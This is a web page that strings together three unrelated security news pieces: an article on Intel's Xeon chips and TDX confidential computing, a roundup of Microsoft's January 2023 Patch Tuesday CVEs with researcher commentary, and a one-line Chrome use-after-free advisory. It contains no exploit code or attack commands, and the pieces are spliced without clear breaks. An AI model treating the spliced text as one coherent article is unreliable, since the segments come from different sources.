SGX has been a critical element of Microsoft's Azure confidential computing offerings so far, and TDX in the newer Sapphire Rapids chips will strengthen the security in virtual machines, said Mark Russinovich, the chief technology officer at Microsoft's Azure, during the Xeon launch event.

"We look forward to being one of the first cloud providers to offer confidential services based on Intel 4th Gen Xeon scalable processors with Intel TDX later this year, enabling organizations to achieve confidentiality by seamlessly lifting and shifting their workloads without requiring any code changes," Russinovich said.

Confidential computing could be attractive to organizations concerned about high-value data and applications and services that require strong security.

"It strengthens compliance with data privacy and governance regulations and helps create a more private controlled infrastructure, even when using the public cloud," said Lisa Spelman, corporate vice president and general manager for Xeon products at Intel, during a press briefing on the new chips.

TDX will also be relevant to customers that want to activate private or regulated data in a way that doesn't breach confidentiality, Intel's Rao said.

"Think of a way in which customers use this for multiparty collaborations focused on shared analysis with data privacy," Rao said.

**From Edge to Cloud**

Rao provided some examples of sharing sensitive data securely in financial or healthcare organizations, or to share research for fraud detection. He summarized that confidential computing makes it possible to move workloads securely from the private into the public cloud while meeting data residency and compliance requirements.

Intel's 4th Gen Xeon chips will also be tied to a cloud service called Project Amber, which will help verify trust of computing boundaries from edge to cloud. It will start as an independent attestation service for Intel confidential computing technologies, Rao said. Intel plans to offer Project Amber as a pay-as-you-go feature.

The new Xeon chips will also appear in virtual machine instances in cloud services from Google, IBM, and Alibaba, but the chip maker didn't comment on whether the cloud providers would specifically offer TDX instructions.

AWS has its own confidential computing offerings, while Microsoft also has virtual machine instances with AMD’s on-chip cloud computing features.

Intel is a dominant player in the server market, with an x86 server market share of 82.5% during the third quarter of last year; its closest rival, AMD, sported a 17.5% market share, according to Mercury Research.

Intel's New Xeon Chip Pushes Confidential Computing to the Cloud

Microsoft today released updates to fix nearly 100 security flaws in its Windows operating systems and other software. Highlights from the first Patch Tuesday of 2023 include a zero-day vulnerability in Windows, printer software flaws reported by the U.S. National Security Agency, and a critical Microsoft SharePoint Server bug that allows a remote, unauthenticated attacker to make an anonymous connection.

**Microsoft** today released updates to fix nearly 100 security flaws in its **Windows** operating systems and other software. Highlights from the first **Patch Tuesday** of 2023 include a zero-day vulnerability in Windows, printer software flaws reported by the **U.S. National Security Agency**, and a critical **Microsoft SharePoint Server** bug that allows a remote, unauthenticated attacker to make an anonymous connection.

At least 11 of the patches released today are rated “Critical” by Microsoft, meaning they could be exploited by malware or malcontents to seize remote control over vulnerable Windows systems with little or no help from users.

Of particular concern for organizations running **Microsoft SharePoint Server** is CVE-2023-21743. This is a Critical security bypass flaw that could allow a remote, unauthenticated attacker to make an anonymous connection to a vulnerable SharePoint server. Microsoft says this flaw is “more likely to be exploited” at some point.

But patching this bug may not be as simple as deploying Microsoft updates. **Dustin Childs**, head of threat awareness at **Trend Micro’s Zero Day Initiative**, said sysadmins need to take additional measures to be fully protected from this vulnerability.

“To fully resolve this bug, you must also trigger a SharePoint upgrade action that’s also included in this update,” Childs said. “Full details on how to do this are in the bulletin. Situations like this are why people who scream ‘Just patch it!’ show they have never actually had to patch an enterprise in the real world.”

Eighty-seven of the vulnerabilities earned Redmond’s slightly less dire “Important” severity rating. That designation describes vulnerabilities “whose exploitation could result in compromise of the confidentiality, integrity, or availability of user data, or of the integrity or availability of processing resources.”

Among the more Important bugs this month is CVE-2023-21674, which is an “elevation of privilege” weakness in most supported versions of Windows that has already been abused in active attacks.

**Satnam Narang**, senior staff research engineer at **Tenable**, said although details about the flaw were not available at the time Microsoft published its advisory on Patch Tuesday, it appears this was likely chained together with a vulnerability in a Chromium-based browser such as Google Chrome or Microsoft Edge in order to break out of a browser’s sandbox and gain full system access.

“Vulnerabilities like CVE-2023-21674 are typically the work of advanced persistent threat (APT) groups as part of targeted attacks,” Narang said. “The likelihood of future widespread exploitation of an exploit chain like this is limited due to auto-update functionality used to patch browsers.”

By the way, when was the last time you completely closed out your Web browser and restarted it? Some browsers will automatically download and install new security updates, but the protection from those updates usually only happens after you restart the browser.

Speaking of APT groups, the U.S. National Security Agency is credited with reporting CVE-2023-21678, which is another “important” vulnerability in the Windows Print Spooler software.

There have been so many vulnerabilities patched in Microsoft’s printing software over the past year (including the dastardly PrintNightmare attacks and borked patches) that KrebsOnSecurity has joked about Patch Tuesday reports being sponsored by Print Spooler. Tenable’s Narang points out that this is the third Print Spooler flaw the NSA has reported in the last year.

**Kevin Breen** at **Immersive Labs** called special attention to CVE-2023-21563, which is a security feature bypass in **BitLocker**, the data and disk encryption technology built into enterprise versions of Windows.

“For organizations that have remote users, or users that travel, this vulnerability may be of interest,” Breen said. “We rely on BitLocker and full-disk encryption tools to keep our files and data safe in the event a laptop or device is stolen. While information is light, this appears to suggest that it could be possible for an attacker to bypass this protection and gain access to the underlying operating system and its contents. If security teams are not able to apply this patch, one potential mitigation could be to ensure Remote Device Management is deployed with the ability to remotely disable and wipe assets.”

There are also two **Microsoft Exchange** vulnerabilities patched this month — CVE-2023-21762 and CVE-2023-21745. Given the rapidity with which threat actors exploit new Exchange bugs to steal corporate email and infiltrate vulnerable systems, organizations using Exchange should patch immediately. Microsoft’s advisory says these Exchange flaws are indeed “more likely to be exploited.”

**Adobe** released four patches addressing 29 flaws in **Adobe Acrobat** and **Reader**, **InDesign**, **InCopy**, and **Adobe Dimension**. The update for Reader fixes 15 bugs with eight of these being ranked Critical in severity (allowing arbitrary code execution if an affected system opened a specially crafted file).

For a more granular rundown on the updates released today, see the SANS Internet Storm Center roundup. Nearly 100 updates is a lot, and there are bound to be a few patches that cause problems for organizations and end users. When that happens, AskWoody.com usually has the lowdown.

Please consider backing up your data and/or imaging your system before applying any updates. And please sound off in the comments if you experience any problems as a result of these patches.

Microsoft Patch Tuesday, January 2023 Edition

Use after free in Overview Mode in Google Chrome on Chrome OS prior to 109.0.5414.74 allowed a remote attacker who convinced a user to engage in specific UI interactions to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

Tag

#google